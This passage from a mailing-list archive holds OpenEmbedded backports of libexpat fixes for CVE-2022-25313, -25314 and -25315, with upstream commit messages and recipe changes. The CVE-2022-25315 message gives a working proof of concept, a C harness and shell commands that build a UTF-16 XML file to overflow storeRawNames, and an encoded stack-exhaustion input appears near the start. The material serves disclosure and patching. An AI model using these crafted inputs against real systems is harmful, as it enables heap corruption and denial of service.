+ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
+ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
+EOF
+base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
+```
+
+3. Run Proof of Concept
+
+```
+./poc poc.xml
+```
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
+
+CVE: CVE-2022-25313
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
+ 1 file changed, 79 insertions(+), 37 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..594cf12c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
+   return next;
+ }
+ 
+-static void
+-build_node(XML_Parser parser, int src_node, XML_Content *dest,
+-           XML_Content **contpos, XML_Char **strpos) {
+-  DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+-  dest->type = dtd->scaffold[src_node].type;
+-  dest->quant = dtd->scaffold[src_node].quant;
+-  if (dest->type == XML_CTYPE_NAME) {
+-    const XML_Char *src;
+-    dest->name = *strpos;
+-    src = dtd->scaffold[src_node].name;
+-    for (;;) {
+-      *(*strpos)++ = *src;
+-      if (! *src)
+-        break;
+-      src++;
+-    }
+-    dest->numchildren = 0;
+-    dest->children = NULL;
+-  } else {
+-    unsigned int i;
+-    int cn;
+-    dest->numchildren = dtd->scaffold[src_node].childcnt;
+-    dest->children = *contpos;
+-    *contpos += dest->numchildren;
+-    for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
+-         i++, cn = dtd->scaffold[cn].nextsib) {
+-      build_node(parser, cn, &(dest->children[i]), contpos, strpos);
+-    }
+-    dest->name = NULL;
+-  }
+-}
+-
+ static XML_Content *
+ build_model(XML_Parser parser) {
++  /* Function build_model transforms the existing parser->m_dtd->scaffold
++   * array of CONTENT_SCAFFOLD tree nodes into a new array of
++   * XML_Content tree nodes followed by a gapless list of zero-terminated
++   * strings. */
+   DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+   XML_Content *ret;
+-  XML_Content *cpos;
+-  XML_Char *str;
++  XML_Char *str; /* the current string writing location */
+ 
+   /* Detect and prevent integer overflow.
+    * The preprocessor guard addresses the "always false" warning
+@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
+   if (! ret)
+     return NULL;
+ 
+-  str = (XML_Char *)(&ret[dtd->scaffCount]);
+-  cpos = &ret[1];
++  /* What follows is an iterative implementation (of what was previously done
++   * recursively in a dedicated function called "build_node".  The old recursive
++   * build_node could be forced into stack exhaustion from input as small as a
++   * few megabyte, and so that was a security issue.  Hence, a function call
++   * stack is avoided now by resolving recursion.)
++   *
++   * The iterative approach works as follows:
++   *
++   * - We use space in the target array for building a temporary stack structure
++   *   while that space is still unused.
++   *   The stack grows from the array's end downwards and the "actual data"
++   *   grows from the start upwards, sequentially.
++   *   (Because stack grows downwards, pushing onto the stack is a decrement
++   *   while popping off the stack is an increment.)
++   *
++   * - A stack element appears as a regular XML_Content node on the outside,
++   *   but only uses a single field -- numchildren -- to store the source
++   *   tree node array index.  These are the breadcrumbs leading the way back
++   *   during pre-order (node first) depth-first traversal.
++   *
++   * - The reason we know the stack will never grow into (or overlap with)
++   *   the area with data of value at the start of the array is because
++   *   the overall number of elements to process matches the size of the array,
++   *   and the sum of fully processed nodes and yet-to-be processed nodes
++   *   on the stack, cannot be more than the total number of nodes.
++   *   It is possible for the top of the stack and the about-to-write node
++   *   to meet, but that is safe because we get the source index out
++   *   before doing any writes on that node.
++   */
++  XML_Content *dest = ret; /* tree node writing location, moves upwards */
++  XML_Content *const destLimit = &ret[dtd->scaffCount];
++  XML_Content *const stackBottom = &ret[dtd->scaffCount];
++  XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++  str = (XML_Char *)&ret[dtd->scaffCount];
++
++  /* Push source tree root node index onto the stack */
++  (--stackTop)->numchildren = 0;
++
++  for (; dest < destLimit; dest++) {
++    /* Pop source tree node index off the stack */
++    const int src_node = (int)(stackTop++)->numchildren;
++
++    /* Convert item */
++    dest->type = dtd->scaffold[src_node].type;
++    dest->quant = dtd->scaffold[src_node].quant;
++    if (dest->type == XML_CTYPE_NAME) {
++      const XML_Char *src;
++      dest->name = str;
++      src = dtd->scaffold[src_node].name;
++      for (;;) {
++        *str++ = *src;
++        if (! *src)
++          break;
++        src++;
++      }
++      dest->numchildren = 0;
++      dest->children = NULL;
++    } else {
++      unsigned int i;
++      int cn;
++      dest->name = NULL;
++      dest->numchildren = dtd->scaffold[src_node].childcnt;
++      dest->children = &dest[1];
++
++      /* Push children to the stack
++       * in a way where the first child ends up at the top of the
++       * (downwards growing) stack, in order to be processed first. */
++      stackTop -= dest->numchildren;
++      for (i = 0, cn = dtd->scaffold[src_node].firstchild;
++           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
++        (stackTop + i)->numchildren = (unsigned int)cn;
++      }
++    }
++  }
+ 
+-  build_node(parser, 0, ret, &cpos, &str);
+   return ret;
+ }
+ 
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index c0103767b1..4d945a295e 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -15,6 +15,8 @@ SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
            file://CVE-2022-23990.patch \
            file://CVE-2022-25235.patch \
            file://CVE-2022-25236.patch \
+           file://CVE-2022-25313.patch \
+           file://CVE-2022-25313-regression.patch \
            file://libtool-tag.patch \
          "
 

From patchwork Fri Mar  4 15:04:15 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4685
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 099F1C4332F
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:18 +0000 (UTC)
Received: from mail-pl1-f177.google.com (mail-pl1-f177.google.com
 [209.85.214.177])
 by mx.groups.io with SMTP id smtpd.web10.7845.1646406301644090728
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:01 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=q0fEcoHb;
 spf=softfail (domain: sakoman.com, ip: 209.85.214.177,
 mailfrom: steve@sakoman.com)
Received: by mail-pl1-f177.google.com with SMTP id z2so7959230plg.8
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:01 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=NrFuNB8fEPnlZoo6sufh0ZnuR8tRVkiQ4CDM9TrntF8=;
        b=q0fEcoHb4+dzFgmMsdrB8uLMzo/z5pFgbZR5aN1v7ClFMInSAThPoMT4oWKNrM3wC8
         5geLAwAv2INOe+dX6I92TXmpGMJQJ6X5N5ZxYJld6A3gH90m9o2q8mhLH7ktc6ZHA624
         f3UajwStLnnMw3lk0U0Yj8jR2WOVi4vYws2PROpGS/bRP8cZV1TIVvGJ6Aml4GFOLMK/
         3y1RIwjHbo95MqpWibkORiqkHKP+jIp95GR2SqtHQZbNFc4EXlD863gWQjZMkJNM9M8C
         4dzTCNq7CIEjnxVVCbOi68UWSthsqRD0xNP2twphGs4RP3x+AyfY317U3CXF8FoHlYKP
         iVog==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=NrFuNB8fEPnlZoo6sufh0ZnuR8tRVkiQ4CDM9TrntF8=;
        b=zlpQ9rYRWTFqD9jW/PeLXeL5EP7yVJLJshS4P81cVbYzOFB4TEjvRDeWoSqfSOz8b6
         I73ir9wwZAa2AcMXxKsUEEMHlXWePoYQLAjFh79HOInATurUivFrJgQUeAQooEBJ4KHd
         Kwic739NtPlnRGbIkpHOXoHaA46QURJFoqFFfLHglUSg+BSnkiHoAMLoDBNNg6S8Q0Vo
         actMtMZ8ofeTekLdaCn2Uq/u2LcyDGFJEJdUuwhjunDbgHC/B/xw36GpbGNAzqj0CeDK
         XGFXC3p1EjCVFUqvEOrMMX22EWfbsP5xopCLcw7M+RpKj2OJfFZ0jefCOrL/9tdM64yK
         zg7g==
X-Gm-Message-State: AOAM5334RDw6DwADEDlc78vl6fwqQkNNQ8Bj/PMSV5J7ktHJ9JzVQaQR
	SMvJXPC3SQGBEwsiFnF7teUlXyoPO+KsYp/fmAU=
X-Google-Smtp-Source: 
 ABdhPJz75SPsCxGwBL9flOL9OUpw/ndo7YoOh3cBenMeHfvpNOhEE+A2rYJpmv6rEjzeaScof7Y94A==
X-Received: by 2002:a17:902:aa08:b0:151:a5ff:eca3 with SMTP id
 be8-20020a170902aa0800b00151a5ffeca3mr9923571plb.19.1646406300642;
        Fri, 04 Mar 2022 07:05:00 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.59
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:00 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 07/18] expat: fix CVE-2022-25314
Date: Fri,  4 Mar 2022 05:04:15 -1000
Message-Id: 
 <b92c33285c5f886c95a3734e61007b522b62a71f.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:18 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162726

In Expat (aka libexpat) before 2.4.5, there is an integer overflow in
copyString.

Backport patch from:
https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd

CVE: CVE-2022-25314

Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../expat/expat/CVE-2022-25314.patch          | 32 +++++++++++++++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |  1 +
 2 files changed, 33 insertions(+)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25314.patch

diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+ 
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+-  int charsRequired = 0;
++  size_t charsRequired = 0;
+   XML_Char *result;
+ 
+   /* First determine how long the string is */
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 4d945a295e..dd8eeddf80 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -17,6 +17,7 @@ SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
            file://CVE-2022-25236.patch \
            file://CVE-2022-25313.patch \
            file://CVE-2022-25313-regression.patch \
+           file://CVE-2022-25314.patch \
            file://libtool-tag.patch \
          "
 

From patchwork Fri Mar  4 15:04:16 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4687
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 13BF8C433EF
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:18 +0000 (UTC)
Received: from mail-pf1-f177.google.com (mail-pf1-f177.google.com
 [209.85.210.177])
 by mx.groups.io with SMTP id smtpd.web08.7803.1646406303882353744
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:04 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=WSZEqwEj;
 spf=softfail (domain: sakoman.com, ip: 209.85.210.177,
 mailfrom: steve@sakoman.com)
Received: by mail-pf1-f177.google.com with SMTP id a5so7823366pfv.9
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:03 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=U1TIbtml1HETKNuzU4iacUno41/lHUdLWS3UHPKujEM=;
        b=WSZEqwEjRDjACLI/3Q4U+bX0Gitc4qsTnU9JiU0GCT8XIyEck3e6nG3N2vCDOJb8KH
         WGFPjiyEk1oQ5qkpXfZQs2VqXP2OuNGqNBOrlcS1UDRK8agUIO0MGQjo0cnecmroZizx
         0TVxmC8cldNfYl0zDo8ydaR29bHOZd3+3TTnnBXHvFG+2YGkZBSVWQr3P6Ij3/tjZMga
         QTErdJw6CpwUJM8jTwCFAf8vkKFIdcyJl2qGO8CV0IhASXJT0xu4VhMIfQoLs+afdSJK
         kmRV6T2+qeNCWbIIxDxwS0pDSsW9CcIHjMEPCscT+oUd20H/saE2j4mlaOvJDmtl0bV+
         ex6g==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=U1TIbtml1HETKNuzU4iacUno41/lHUdLWS3UHPKujEM=;
        b=OoWqEw0sWD5k2pLE40u5OI1VQiFGNuVnFBQSDVlH0krnzfAc01tmEfuRSF1wcmWJdV
         AFfXVtDH+H/grhE+HXGE2aFcaiBQ8KTioQ4okR3iUFvq1NJB929mZZ3NeZ58xwkcnAL6
         VEGcLbT/0W7u6AY8CFBT7UBNDJ/A/uDqzgeZJF9C6INoDKcKomku7YNwhyf9UYAF4RbO
         ARUL0s5BF/gf2fnGcymAFqV3KQjB49cR5fGEFyc1Ws1P+kWroXSbHPdUi7bncJUzUbqz
         /UmasAYq7kxMS1KnSPrkRbxGsJO9H7uNdbYrAPpZJ9/HO5xBANRc/tDE/nztjYPUkm53
         mICw==
X-Gm-Message-State: AOAM533nrYuXo0hPP7zbwY7naB6lJqiGsiHvCKw0Wn6WW4l77FETBSjN
	0eLQLgInq+4zEBRcPqA15+mPgw5ogIH3YFPp+Y8=
X-Google-Smtp-Source: 
 ABdhPJyMqltM2OkG7cd1OqXcFs3t44tUBi2szo1VusclDyBZHw8ISGWh8z82osOGhJYNXJ/m88ZWRQ==
X-Received: by 2002:a05:6a00:22cc:b0:4e0:58dc:e489 with SMTP id
 f12-20020a056a0022cc00b004e058dce489mr43837050pfj.58.1646406302731;
        Fri, 04 Mar 2022 07:05:02 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.01
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:02 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 08/18] expat: fix CVE-2022-25315
Date: Fri,  4 Mar 2022 05:04:16 -1000
Message-Id: 
 <9cb21fd89de99abeeef1dd962e6019943de546a4.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:18 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162727

In Expat (aka libexpat) before 2.4.5, there is an integer overflow
in storeRawNames.

Backport patch from:
https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9

CVE: CVE-2022-25315

Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../expat/expat/CVE-2022-25315.patch          | 145 ++++++++++++++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |   1 +
 2 files changed, 146 insertions(+)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25315.patch

diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
+From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:55:46 +0000
+Subject: [PATCH] Prevent integer overflow in storeRawNames
+
+It is possible to use an integer overflow in storeRawNames for out of
+boundary heap writes. Default configuration is affected. If compiled
+with XML_UNICODE then the attack does not work. Compiling with
+-fsanitize=address confirms the following proof of concept.
+
+The problem can be exploited by abusing the m_buffer expansion logic.
+Even though the initial size of m_buffer is a power of two, eventually
+it can end up a little bit lower, thus allowing allocations very close
+to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
+names can be parsed which are almost INT_MAX in size.
+
+Unfortunately (from an attacker point of view) INT_MAX/2 is also a
+limitation in string pools. Having a tag name of INT_MAX/2 characters
+or more is not possible.
+
+Expat can convert between different encodings. UTF-16 documents which
+contain only ASCII representable characters are twice as large as their
+ASCII encoded counter-parts.
+
+The proof of concept works by taking these three considerations into
+account:
+
+1. Move the m_buffer size slightly below a power of two by having a
+   short root node <a>. This allows the m_buffer to grow very close
+   to INT_MAX.
+2. The string pooling forbids tag names longer than or equal to
+   INT_MAX/2, so keep the attack tag name smaller than that.
+3. To be able to still overflow INT_MAX even though the name is
+   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
+   which only contains ASCII characters. UTF-16 always stores two
+   bytes per character while the tag name is converted to using only
+   one. Our attack node byte count must be a bit higher than
+   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
+   in sum can overflow INT_MAX.
+
+Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
+without running into INT_MAX boundary check. The string pooling is
+able to store INT_MAX/3 as tag name because the amount is below
+INT_MAX/2 limitation. And creating the sum of both eventually overflows
+in storeRawNames.
+
+Proof of Concept:
+
+1. Compile expat with -fsanitize=address.
+
+2. Create Proof of Concept binary which iterates through input
+   file 16 MB at once for better performance and easier integer
+   calculations:
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdlib.h>
+ #include <stdio.h>
+
+ #define CHUNK (16 * 1024 * 1024)
+ int main(int argc, char *argv[]) {
+   XML_Parser parser;
+   FILE *fp;
+   char *buf;
+   int i;
+
+   if (argc != 2)
+     errx(1, "usage: poc file.xml");
+   if ((parser = XML_ParserCreate(NULL)) == NULL)
+     errx(1, "failed to create expat parser");
+   if ((fp = fopen(argv[1], "r")) == NULL) {
+     XML_ParserFree(parser);
+     err(1, "failed to open file");
+   }
+   if ((buf = malloc(CHUNK)) == NULL) {
+     fclose(fp);
+     XML_ParserFree(parser);
+     err(1, "failed to allocate buffer");
+   }
+   i = 0;
+   while (fread(buf, CHUNK, 1, fp) == 1) {
+     printf("iteration %d: XML_Parse returns %d\n", ++i,
+       XML_Parse(parser, buf, CHUNK, XML_FALSE));
+   }
+   free(buf);
+   fclose(fp);
+   XML_ParserFree(parser);
+   return 0;
+ }
+EOF
+gcc -fsanitize=address -lexpat -o poc poc.c
+```
+
+3. Construct specially prepared UTF-16 XML file:
+
+```
+dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
+echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
+echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
+iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
+```
+
+4. Run proof of concept:
+
+```
+./poc poc-utf16.xml
+```
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
+
+CVE: CVE-2022-25315
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ lib/xmlparse.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..f34d6ab5 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
+   while (tag) {
+     int bufSize;
+     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
++    size_t rawNameLen;
+     char *rawNameBuf = tag->buf + nameLen;
+     /* Stop if already stored.  Since m_tagStack is a stack, we can stop
+        at the first entry that has already been copied; everything
+@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
+     /* For re-use purposes we need to ensure that the
+        size of tag->buf is a multiple of sizeof(XML_Char).
+     */
+-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++    /* Detect and prevent integer overflow. */
++    if (rawNameLen > (size_t)INT_MAX - nameLen)
++      return XML_FALSE;
++    bufSize = nameLen + (int)rawNameLen;
+     if (bufSize > tag->bufEnd - tag->buf) {
+       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
+       if (temp == NULL)
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index dd8eeddf80..f50e535922 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -18,6 +18,7 @@ SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
            file://CVE-2022-25313.patch \
            file://CVE-2022-25313-regression.patch \
            file://CVE-2022-25314.patch \
+           file://CVE-2022-25315.patch \
            file://libtool-tag.patch \
          "
 

From patchwork Fri Mar  4 15:04:17 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4680
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 00906C433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:07 +0000 (UTC)
Received: from mail-pj1-f41.google.com (mail-pj1-f41.google.com
 [209.85.216.41])
 by mx.groups.io with SMTP id smtpd.web08.7806.1646406305814916345
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:05 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=eHEIEiDq;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.41,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f41.google.com with SMTP id
 gj15-20020a17090b108f00b001bef86c67c1so8061112pjb.3
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:05 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=8eVtFaYM04HQQ5bsWx8VRjhFLQn7ij6XsrFWcgZg/1s=;
        b=eHEIEiDqhixf2y9sBuWZW61fsEyZ2lINXZjrFEr/GCwRj7tE+onST09RPVKR2LpIak
         xKqBacYfROW/tKWI7+6Fv1sNjzfnkKQRC116FiwmOWHsCDrH0vXVzWgwlfzOjph43Xta
         HqEj4hqCCuRMyIIQqRzimxdCWKVUBilAm6AQTRzr0dObpujIMldl1DeRbcxA2FGUGUb8
         Cu62IUWjcr+CGBYjJcFTOlPAZTF/sUfwf5e1Rke/M09TdvOzm/OB52XQsIMXihjBm9ed
         QjXEphtSV8F5NG5yr5BB7b/tMHYWj/ChOM53XHzt7ljMOlGgJrfKFnXeTS5iwG4HOIXe
         V2mg==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=8eVtFaYM04HQQ5bsWx8VRjhFLQn7ij6XsrFWcgZg/1s=;
        b=3dzi962fcyqRNDEGWF4Z+qAhxrHHvGk0zUAyahPFaZ2hM2cEgX7uARarLzKGggGKGR
         BDXV1Z++LsQfICVlLaD+siR7WAHMqmp62cUuDFJujCAteN1LmuFYfVDOSAa47mVYJyX5
         XrV4S6F6PR2mHGWrBRgs3ob6S66C5zduJYjAskx1w8SyIreU2tO2W/fbShJ2PdXRMl2l
         vs1pgOnS4aBvdtvuTCaXmZEN2kytRoz4ZyTzE9l65JOuPCGCniwUHkLOC7GmNh2ilzL9
         2unOcdIRYJVuTTEm1G+ETHP7xl7vWEAZmKR+OcylOlmYHe1jjhr3DVJyy+4CnZyfmr3h
         0dww==
X-Gm-Message-State: AOAM531QcZi2WHmaCemhJVOXNoHlc5KA5OL76Z+BRaiV22tKA5BvH3pa
	pQHpJNNGndOsVXdoSvIIOPAV9iUUviE64VK2VWo=
X-Google-Smtp-Source: 
 ABdhPJwoMMEvy2hjoMtTN67/lmhM3tClNyR0O0fuDXQOxqRYm3FbIIehWjNoZNAAeGkYhjHBHKvh8w==
X-Received: by 2002:a17:902:6f0f:b0:151:3f2d:8b21 with SMTP id
 w15-20020a1709026f0f00b001513f2d8b21mr35973167plk.123.1646406304795;
        Fri, 04 Mar 2022 07:05:04 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.03
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:04 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 09/18] coreutils: remove obsolete ignored CVE list
Date: Fri,  4 Mar 2022 05:04:17 -1000
Message-Id: 
